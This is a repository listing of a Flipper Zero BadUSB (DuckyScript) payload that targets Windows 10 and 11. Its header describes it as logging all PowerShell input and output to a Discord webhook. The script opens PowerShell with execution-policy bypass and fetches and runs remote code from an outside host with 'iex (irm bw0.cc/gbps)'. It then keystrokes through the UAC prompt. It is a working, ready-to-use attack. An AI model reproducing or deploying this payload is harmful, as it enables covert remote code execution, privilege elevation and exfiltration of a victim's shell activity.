Files
BadUSB-Files-For-FlipperZero/Global-PS-Trascription-to-Discord/Global-PS-Trascript-to-DC.txt
2025-06-20 10:55:56 +00:00

16 lines
458 B
Plaintext

REM Title: Global PS Trascription to Discord
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Log all powershell input and output to a discord webhook
REM Target: Windows 10, 11
REM some setup for dukie script.
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/gbps)
CTRL-SHIFT ENTER
DELAY 2500
ALT y